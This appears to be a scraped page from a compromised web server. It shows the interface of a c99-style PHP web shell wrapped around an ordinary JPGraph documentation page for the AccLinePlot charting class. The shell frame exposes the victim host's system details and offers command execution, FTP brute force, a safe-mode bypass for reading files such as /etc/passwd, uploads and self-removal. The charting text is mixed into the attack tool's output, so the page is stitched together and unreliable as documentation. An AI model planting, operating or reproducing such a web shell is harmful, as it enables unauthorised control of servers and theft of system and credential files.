!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AccLinePlot.html (5.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS AccLinePlot EXTENDS Plot
(Defined in: jpgraph_line.php : 391)
 AccLinePlot  Plot 
 AccLinePlot() 
 Max() 
 Min() 
 HideLegend() 
 SetCenter() 
 SetColor() 
 SetCSIMTargets() 
 SetLegend() 
 SetLineWeight() 
 

Class usage and Overview
Accumulated bar plot.
Used to create a line plot where each individual data point is the sum of the individual series data points.

Features:

  1. Unlimited number of series

 

See also related classes:
AccBarPlot and LinePlot

 


Class Methods

 

 

Constructor

ArgumentDefaultDescription
$plots  Array of line plots to use

Description
Creates a new accumulated line plot from a number of line plots. 
 
See also
LinePlot::LinePlot

Example

$line1 = new LinePlot($datay1);
$line2 = new LinePlot($datay2);
$aline = array($line1,$line2);
$acclineplot = new AccLinePlot($aline);

 

 

Return the max value of data points in plot.


Description
Takes into account all series and returns the maximum Y and X values for all the data series. Used internally to determine the autoscaling. 
 
See also
Plot::Max

Example

list($xmax,$ymax) = $acclineplot->Max();

 

 

Return the min value of all data points in plot.


Description
Takes into account all series and returns the minimum Y and X value. Used internally to determine autoscaling. 
 
See also
BarPlot::Min and Plot::Min

Example

list($xmin,$ymin) = $acclineplot->Min()



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--